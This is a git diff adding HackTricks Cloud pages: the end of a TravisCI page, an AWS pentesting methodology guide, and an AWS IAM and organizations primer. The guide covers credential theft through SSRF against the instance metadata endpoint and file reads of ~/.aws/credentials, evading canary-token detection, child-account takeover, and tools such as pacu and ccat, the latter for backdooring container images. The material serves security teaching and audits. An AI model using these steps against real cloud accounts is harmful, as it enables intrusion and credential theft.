this way won't appear listed in the environmental variables of the settings. 
+ +### Custom Encrypted Files + +Same way as before, TravisCI also allows to **encrypt files and then decrypt them during the build**: + +``` +travis encrypt-file super_secret.txt -r carlospolop/t-ci-test + +encrypting super_secret.txt for carlospolop/t-ci-test +storing result as super_secret.txt.enc +storing secure env variables for decryption + +Please add the following to your build script (before_install stage in your .travis.yml, for instance): + + openssl aes-256-cbc -K $encrypted_355e94ba1091_key -iv $encrypted_355e94ba1091_iv -in super_secret.txt.enc -out super_secret.txt -d + +Pro Tip: You can add it automatically by running with --add. + +Make sure to add super_secret.txt.enc to the git repository. +Make sure not to add super_secret.txt to the git repository. +Commit all changes to your .travis.yml. +``` + +Note that when encrypting a file 2 Env Variables will be configured inside the repo such as: + +![](<../../.gitbook/assets/image (170).png>) + +## TravisCI Enterprise + +Travis CI Enterprise is an **on-prem version of Travis CI**, which you can deploy **in your infrastructure**. Think of the ‘server’ version of Travis CI. Using Travis CI allows you to enable an easy-to-use Continuous Integration/Continuous Deployment (CI/CD) system in an environment, which you can configure and secure as you want to. + +**Travis CI Enterprise consists of two major parts:** + +1. TCI **services** (or TCI Core Services), responsible for integration with version control systems, authorizing builds, scheduling build jobs, etc. +2. TCI **Worker** and build environment images (also called OS images). + +**TCI Core services require the following:** + +1. A **PostgreSQL11** (or later) database. +2. An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required +3. 
Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details. + +**TCI Worker requires the following:** + +1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**. +2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details. + +The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure. + +![](<../../.gitbook/assets/image (199).png>) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/README.md b/pentesting-cloud/aws-security/README.md new file mode 100644 index 0000000000..1efc09d3b8 --- /dev/null +++ b/pentesting-cloud/aws-security/README.md @@ -0,0 +1,414 @@ +# AWS Pentesting + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +**Before start pentesting** an **AWS** environment there are a few **basics things you need to know** about how AWS works to help you understand what you need to do, how to find misconfigurations and how to exploit them. + +Concepts such as organization hierarchy, IAM and other basic concepts are explained in: + +{% content-ref url="aws-basic-information/" %} +[aws-basic-information](aws-basic-information/) +{% endcontent-ref %} + +## Labs to learn + +* [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) +* [https://github.com/BishopFox/iam-vulnerable](https://github.com/BishopFox/iam-vulnerable) +* [https://github.com/nccgroup/sadcloud](https://github.com/nccgroup/sadcloud) +* [https://github.com/bridgecrewio/terragoat](https://github.com/bridgecrewio/terragoat) +* [https://github.com/ine-labs/AWSGoat](https://github.com/ine-labs/AWSGoat) +* [http://flaws.cloud/](http://flaws.cloud/) +* [http://flaws2.cloud/](http://flaws2.cloud/) + +Tools to simulate attacks: + +* [https://github.com/Datadog/stratus-red-team/](https://github.com/Datadog/stratus-red-team/) +* [https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main](https://github.com/sbasu7241/AWS-Threat-Simulation-and-Detection/tree/main) + +## AWS Pentester/Red Team Methodology + +In order to audit an AWS environment it's very important to know: which **services are being used**, what is **being exposed**, who has **access** to what, and how are internal AWS services an **external services** connected. + +From a Red Team point of view, the **first step to compromise an AWS environment** is to manage to obtain some **credentials**. 
Here you have some ideas on how to do that: + +* **Leaks** in github (or similar) - OSINT +* **Social** Engineering +* **Password** reuse (password leaks) +* Vulnerabilities in AWS-Hosted Applications + * [**Server Side Request Forgery**](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf) with access to metadata endpoint + * **Local File Read** + * `/home/USERNAME/.aws/credentials` + * `C:\Users\USERNAME\.aws\credentials` +* 3rd parties **breached** +* **Internal** Employee +* [**Cognito** ](aws-services/aws-cognito-enum/#cognito)credentials + +Or by **compromising an unauthenticated service** exposed: + +{% content-ref url="aws-unauthenticated-enum-access/" %} +[aws-unauthenticated-enum-access](aws-unauthenticated-enum-access/) +{% endcontent-ref %} + +Or if you are doing a **review** you could just **ask for credentials** with these roles: + +{% content-ref url="aws-permissions-for-a-pentest.md" %} +[aws-permissions-for-a-pentest.md](aws-permissions-for-a-pentest.md) +{% endcontent-ref %} + +{% hint style="info" %} +After you have managed to obtain credentials, you need to know **to who do those creds belong**, and **what they have access to**, so you need to perform some basic enumeration: +{% endhint %} + +## Basic Enumeration + +### SSRF + +If you found a SSRF in a machine inside AWS check this page for tricks: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} + +### Whoami + +One of the first things you need to know is who you are (in where account you are in other info about the AWS env): + +```bash +# Easiest way, but might be monitored? 
+aws sts get-caller-identity +aws iam get-user # This will get your own user + +# If you have a Key ID +aws sts get-access-key-info --access-key-id=ASIA1234567890123456 + +# Get inside error message +aws sns publish --topic-arn arn:aws:sns:us-east-1:*account id*:aaa --message aaa + +# From metadata +TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` +curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/dynamic/instance-identity/document +``` + +{% hint style="danger" %} +Note that companies might use **canary tokens** to identify when **tokens are being stolen and used**. It's recommended to check if a token is a canary token or not before using it.\ +For more info [**check this page**](aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md#honeytokens-bypass). +{% endhint %} + +### Org Enumeration + +{% content-ref url="aws-services/aws-organizations-enum.md" %} +[aws-organizations-enum.md](aws-services/aws-organizations-enum.md) +{% endcontent-ref %} + +### IAM Enumeration + +If you have enough permissions **checking the privileges of each entity inside the AWS account** will help you understand what you and other identities can do and how to **escalate privileges**. + +If you don't have enough permissions to enumerate IAM, you can **steal bruteforce them** to figure them out.\ +Check **how to do the numeration and brute-forcing** in: + +{% content-ref url="aws-services/aws-iam-enum.md" %} +[aws-iam-enum.md](aws-services/aws-iam-enum.md) +{% endcontent-ref %} + +{% hint style="info" %} +Now that you **have some information about your credentials** (and if you are a red team hopefully you **haven't been detected**). 
It's time to figure out which services are being used in the environment.\ +In the following section you can check some ways to **enumerate some common services.** +{% endhint %} + +## Services Enumeration, Post-Exploitation & Persistence + +AWS has an astonishing amount of services, in the following page you will find **basic information, enumeration** cheatsheets\*\*,\*\* how to **avoid detection**, obtain **persistence**, and other **post-exploitation** tricks about some of them: + +{% content-ref url="aws-services/" %} +[aws-services](aws-services/) +{% endcontent-ref %} + +Note that you **don't** need to perform all the work **manually**, below in this post you can find a **section about** [**automatic tools**](./#automated-tools). + +Moreover, in this stage you might discovered **more services exposed to unauthenticated users,** you might be able to exploit them: + +{% content-ref url="aws-unauthenticated-enum-access/" %} +[aws-unauthenticated-enum-access](aws-unauthenticated-enum-access/) +{% endcontent-ref %} + +## Privilege Escalation + +If you can **check at least your own permissions** over different resources you could **check if you are able to obtain further permissions**. You should focus at least in the permissions indicated in: + +{% content-ref url="aws-privilege-escalation/" %} +[aws-privilege-escalation](aws-privilege-escalation/) +{% endcontent-ref %} + +## Publicly Exposed Services + +While enumerating AWS services you might have found some of them **exposing elements to the Internet** (VM/Containers ports, databases or queue services, snapshots or buckets...).\ +As pentester/red teamer you should always check if you can find **sensitive information / vulnerabilities** on them as they might provide you **further access into the AWS account**. + +In this book you should find **information** about how to find **exposed AWS services and how to check them**. 
About how to find **vulnerabilities in exposed network services** I would recommend you to **search** for the specific **service** in: + +{% embed url="https://book.hacktricks.xyz/" %} + +## Compromising the Organization + +### From the root/management account + +When the management account creates new accounts in the organization, a **new role** is created in the new account, by default named **`OrganizationAccountAccessRole`** and giving **AdministratorAccess** policy to the **management account** to access the new account. + +
+ +So, in order to access as administrator a child account you need: + +* **Compromise** the **management** account and find the **ID** of the **children accounts** and the **names** of the **role** (OrganizationAccountAccessRole by default) allowing the management account to access as admin. + * To find children accounts go to the organizations section in the aws console or run `aws organizations list-accounts` + * You cannot find the name of the roles directly, so check all the custom IAM policies and search any allowing **`sts:AssumeRole` over the previously discovered children accounts**. +* **Compromise** a **principal** in the management account with **`sts:AssumeRole` permission over the role in the children accounts** (even if the account is allowing anyone from the management account to impersonate, as its an external account, specific `sts:AssumeRole` permissions are necessary). + +## Automated Tools + +### Recon + +* [**aws-recon**](https://github.com/darkbitio/aws-recon): A multi-threaded AWS security-focused **inventory collection tool** written in Ruby. + +```bash +# Install +gem install aws_recon + +# Recon and get json +AWS_PROFILE= aws_recon \ + --services S3,EC2 \ + --regions global,us-east-1,us-east-2 \ + --verbose +``` + +* [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist is a **multi-cloud tool for getting Assets** (Hostnames, IP Addresses) from Cloud Providers. +* [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper helps you analyze your Amazon Web Services (AWS) environments. It now contains much more functionality, including auditing for security issues. 
+ +```bash +# Installation steps in github +# Create a config.json file with the aws info, like: +{ + "accounts": [ + { + "default": true, + "id": "", + "name": "dev" + } + ], + "cidrs": + { + "2.2.2.2/28": {"name": "NY Office"} + } +} + +# Enumerate +python3 cloudmapper.py collect --profile dev +## Number of resources discovered +python3 cloudmapper.py stats --accounts dev + +# Create HTML report +## In the report you will find all the info already +python3 cloudmapper.py report --accounts dev + +# Identify potential issues +python3 cloudmapper.py audit --accounts dev --json > audit.json +python3 cloudmapper.py audit --accounts dev --markdow > audit.md +python3 cloudmapper.py iam_report --accounts dev + +# Identify admins +## The permissions search for are in https://github.com/duo-labs/cloudmapper/blob/4df9fd7303e0337ff16a08f5e58f1d46047c4a87/shared/iam_audit.py#L163-L175 +python3 cloudmapper.py find_admins --accounts dev + +# Identify unused elements +python3 cloudmapper.py find_unused --accounts dev + +# Identify publivly exposed resources +python3 cloudmapper.py public --accounts dev + +python cloudmapper.py prepare #Prepare webserver +python cloudmapper.py webserver #Show webserver +``` + +* [**cartography**](https://github.com/lyft/cartography): Cartography is a Python tool that consolidates infrastructure assets and the relationships between them in an intuitive graph view powered by a Neo4j database. + +```bash +# Install +pip install cartography +## At the time of this writting you need neo4j version 3.5.* + +# Get AWS info +AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j +``` + +* [**starbase**](https://github.com/JupiterOne/starbase): Starbase collects assets and relationships from services and systems including cloud infrastructure, SaaS applications, security controls, and more into an intuitive graph view backed by the Neo4j database. 
+* [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (Uses python2) This is a tool that tries to **discover all** [**AWS resources**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) created in an account. +* [**aws\_public\_ips**](https://github.com/arkadiyt/aws_public_ips): It's a tool to **fetch all public IP addresses** (both IPv4/IPv6) associated with an AWS account. + +### Privesc & Exploiting + +* [**SkyArk**](https://github.com/cyberark/SkyArk)**:** Discover the most privileged users in the scanned AWS environment, including the AWS Shadow Admins. It uses powershell. You can find the **definition of privileged policies** in the function **`Check-PrivilegedPolicy`** in [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1). +* [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu is an open-source **AWS exploitation framework**, designed for offensive security testing against cloud environments. It can **enumerate**, find **miss-configurations** and **exploit** them. You can find the **definition of privileged permissions** in [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc\_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) inside the **`user_escalation_methods`** dict. + * Note that pacu **only checks your own privescs paths** (not account wide). 
+ +```bash +# Install +## Feel free to use venvs +pip3 install pacu + +# Use pacu CLI +pacu +> import_keys # import 1 profile from .aws/credentials +> import_keys --all # import all profiles +> list # list modules +> exec iam__enum_permissions # Get permissions +> exec iam__privesc_scan # List privileged permissions +``` + +* [**PMapper**](https://github.com/nccgroup/PMapper): Principal Mapper (PMapper) is a script and library for identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. It models the different IAM Users and Roles in an account as a directed graph, which enables checks for **privilege escalation** and for alternate paths an attacker could take to gain access to a resource or action in AWS. You can check the **permissions used to find privesc** paths in the filenames ended in `_edges.py` in [https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing](https://github.com/nccgroup/PMapper/tree/master/principalmapper/graphing) + +```bash +# Install +pip install principalmapper + +# Get data +pmapper --profile dev graph create +pmapper --profile dev graph display # Show basic info +# Generate graph +pmapper --profile dev visualize # Generate svg graph file (can also be png, dot and graphml) +pmapper --profile dev visualize --only-privesc # Only privesc permissions + +# Generate analysis +pmapper --profile dev analysis +## Run queries +pmapper --profile dev query 'who can do iam:CreateUser' +pmapper --profile dev query 'preset privesc *' # Get privescs with admins + +# Get organization hierarchy data +pmapper --profile dev orgs create +pmapper --profile dev orgs display +``` + +* [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining is an AWS IAM Security Assessment tool that identifies violations of least privilege and generates a risk-prioritized HTML report.\ + It will show you potentially **over privileged** customer, inline and aws 
**policies** and which **principals has access to them**. (It not only checks for privesc but also other kind of interesting permissions, recommended to use). + +```bash +# Install +pip install cloudsplaining + +# Download IAM policies to check +## Only the ones attached with the versions used +cloudsplaining download --profile dev + +# Analyze the IAM policies +cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/ +``` + +* [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack assesses AWS accounts for **subdomain hijacking vulnerabilities** as a result of decoupled Route53 and CloudFront configurations. +* [**ccat**](https://github.com/RhinoSecurityLabs/ccat): List ECR repos -> Pull ECR repo -> Backdoor it -> Push backdoored image +* [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag is a tool that **searches** through public Elastic Block Storage (**EBS) snapshots for secrets** that may have been accidentally left in. + +### Audit + +* [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit by Aqua is an open-source project designed to allow detection of **security risks in cloud infrastructure** accounts, including: Amazon Web Services (AWS), Microsoft Azure, Google Cloud Platform (GCP), Oracle Cloud Infrastructure (OCI), and GitHub (It doesn't look for ShadowAdmins). + +```bash +./index.js --csv=file.csv --console=table --config ./config.js + +# Compiance options: --compliance {hipaa,cis,cis1,cis2,pci} +## use "cis" for cis level 1 and 2 +``` + +* [**Prowler**](https://github.com/prowler-cloud/prowler): Prowler is an Open Source security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness. 
+ +```bash +# Install python3, jq and git +# Install +pip install prowler +prowler -v + +# Run +prowler +prowler aws --profile custom-profile [-M csv json json-asff html] +``` + +* [**CloudFox**](https://github.com/BishopFox/cloudfox): CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure. + +```bash +cloudfox aws --profile [profile-name] all-checks +``` + +* [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. + +```bash +# Install +virtualenv -p python3 venv +source venv/bin/activate +pip install scoutsuite +scout --help + +# Get info +scout aws -p dev +``` + +* [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained) +* [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system. + +### Constant Audit + +* [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting. +* [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. 
All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions. +* [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response. + +## DEBUG: Capture AWS cli requests + +```bash +# Set proxy +export HTTP_PROXY=http://localhost:8080 +export HTTPS_PROXY=http://localhost:8080 + +# Capture with burp nor verifying ssl +aws --no-verify-ssl ... + +# Dowload brup cert and transform it to pem +curl http://127.0.0.1:8080/cert --output Downloads/certificate.cer +openssl x509 -inform der -in Downloads/certificate.cer -out Downloads/certificate.pem + +# Indicate the ca cert to trust +export AWS_CA_BUNDLE=~/Downloads/certificate.pem + +# Run aws cli normally trusting burp cert +aws ... +``` + +## References + +* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +* [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-basic-information/README.md b/pentesting-cloud/aws-security/aws-basic-information/README.md new file mode 100644 index 0000000000..a02cb59a18 --- /dev/null +++ b/pentesting-cloud/aws-security/aws-basic-information/README.md @@ -0,0 +1,410 @@ +# AWS - Basic Information + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Organization Hierarchy + +![](<../../../.gitbook/assets/image (151).png>) + +### Accounts + +In AWS there is a **root account,** which is the **parent container for all the accounts** for your **organization**. However, you don't need to use that account to deploy resources, you can create **other accounts to separate different AWS** infrastructures between them. + +This is very interesting from a **security** point of view, as **one account won't be able to access resources from other account** (except bridges are specifically created), so this way you can create boundaries between deployments. + +Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts. + +* The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: + + * Create accounts in the organization + * Invite other existing accounts to the organization + * Remove accounts from the organization + * Manage invitations + * Apply policies to entities (roots, OUs, or accounts) within the organization + * Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. + * It's possible to login as the root user using the email and password used to create this root account/organization. + + The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. +* **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. 
+ * Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). + +``` +aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com +``` + +### **Organization Units** + +Accounts can be grouped in **Organization Units (OU)**. This way, you can create **policies** for the Organization Unit that are going to be **applied to all the children accounts**. Note that an OU can have other OUs as children. + +```bash +# You can get the root id from aws organizations list-roots +aws organizations create-organizational-unit --parent-id r-lalala --name TestOU +``` + +### Service Control Policy (SCP) + +A **service control policy (SCP)** is a policy that specifies the services and actions that users and roles can use in the accounts that the SCP affects. SCPs are **similar to IAM** permissions policies except that they **don't grant any permissions**. Instead, SCPs specify the **maximum permissions** for an organization, organizational unit (OU), or account. When you attach a SCP to your organization root or an OU, the **SCP limits permissions for entities in member accounts**. + +This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\ +The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked). + +{% hint style="warning" %} +Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. 
+{% endhint %} + +SCP examples: + +* Deny the root account entirely +* Only allow specific regions +* Only allow white-listed services +* Deny GuardDuty, CloudTrail, and S3 Public Block Access from + + being disabled +* Deny security/incident response roles from being deleted or + + modified. +* Deny backups from being deleted. +* Deny creating IAM users and access keys + +Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_manage\_policies\_scps\_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) + +### ARN + +**Amazon Resource Name** is the **unique name** every resource inside AWS has, its composed like this: + +``` +arn:partition:service:region:account-id:resource-type/resource-id +arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env +``` + +Note that there are 4 partitions in AWS but only 3 ways to call them: + +* AWS Standard: `aws` +* AWS China: `aws-cn` +* AWS US public Internet (GovCloud): `aws-us-gov` +* AWS Secret (US Classified): `aws` + +## IAM - Identity and Access Management + +IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. + +* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. +* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. +* **Access Control** - The method and process of how access is granted to a secure resource + +IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. 
+ +### [AWS account root user](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html) + +When you first create an Amazon Web Services (AWS) account, you begin with a single sign-in identity that has **complete access to all** AWS services and resources in the account. This is the AWS account _**root user**_ and is accessed by signing in with the **email address and password that you used to create the account**. + +Note that a new **admin user** will have **less permissions that the root user**. + +From a security point of view, it's recommended to create other users and avoid using this one. + +### [IAM users](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html) + +An IAM _user_ is an entity that you create in AWS to **represent the person or application** that uses it to **interact with AWS**. A user in AWS consists of a name and credentials (password and up to two access keys). + +When you create an IAM user, you grant it **permissions** by making it a **member of a user group** that has appropriate permission policies attached (recommended), or by **directly attaching policies** to the user. + +Users can have **MFA enabled to login** through the console. API tokens of MFA enabled users aren't protected by MFA. If you want to **restrict the access of a users API keys using MFA** you need to indicate in the policy that in order to perform certain actions MFA needs to be present (example [**here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html)). + +#### CLI + +* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT +* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). 
+ +Whenever you need to **change the Access Key** this is the process you should follow:\ +&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ + +### MFA - Multi Factor Authentication + +It's used to **create an additional factor for authentication** in addition to your existing methods, such as password, therefore, creating a multi-factor level of authentication.\ +You can use a **free virtual application or a physical device**. You can use apps like google authentication for free to activate a MFA in AWS. + +Policies with MFA conditions can be attached to the following: + +* An IAM user or group +* A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic +* The trust policy of an IAM role that can be assumed by a user + +If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\ +Note that **`AssumeRole` credentials don't contain this information**. + +```bash +aws sts get-session-token --serial-number --token-code +``` + +As [**stated here**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html), there are a lot of different cases where **MFA cannot be used**. + +### [IAM user groups](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) + +An IAM [user group](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html) is a way to **attach policies to multiple users** at one time, which can make it easier to manage the permissions for those users. **Roles and groups cannot be part of a group**. + +You can attach an **identity-based policy to a user group** so that all of the **users** in the user group **receive the policy's permissions**. 
You **cannot** identify a **user group** as a **`Principal`** in a **policy** (such as a resource-based policy) because groups relate to permissions, not authentication, and principals are authenticated IAM entities. + +Here are some important characteristics of user groups: + +* A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. +* **User groups can't be nested**; they can contain only users, not other user groups. +* There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. +* The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). + +### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) + +An IAM **role** is very **similar** to a **user**, in that it is an **identity with permission policies that determine what** it can and cannot do in AWS. However, a role **does not have any credentials** (password or access keys) associated with it. Instead of being uniquely associated with one person, a role is intended to be **assumable by anyone who needs it (and have enough perms)**. An **IAM user can assume a role to temporarily** take on different permissions for a specific task. A role can be **assigned to a** [**federated user**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_providers.html) who signs in by using an external identity provider instead of IAM. + +An IAM role consists of **two types of policies**: A **trust policy**, which cannot be empty, defining **who can assume** the role, and a **permissions policy**, which cannot be empty, defining **what it can access**. 
+ +#### AWS Security Token Service (STS) + +AWS Security Token Service (STS) is a web service that facilitates the **issuance of temporary, limited-privilege credentials**. It is specifically tailored for: + +### [Temporary credentials in IAM](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html) + +**Temporary credentials are primarily used with IAM roles**, but there are also other uses. You can request temporary credentials that have a more restricted set of permissions than your standard IAM user. This **prevents** you from **accidentally performing tasks that are not permitted** by the more restricted credentials. A benefit of temporary credentials is that they expire automatically after a set period of time. You have control over the duration that the credentials are valid. + +### Policies + +#### Policy Permissions + +Are used to assign permissions. There are 2 types: + +* AWS managed policies (preconfigured by AWS) +* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. + +By **default access** is **denied**, access will be granted if an explicit role has been specified.\ +If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). 
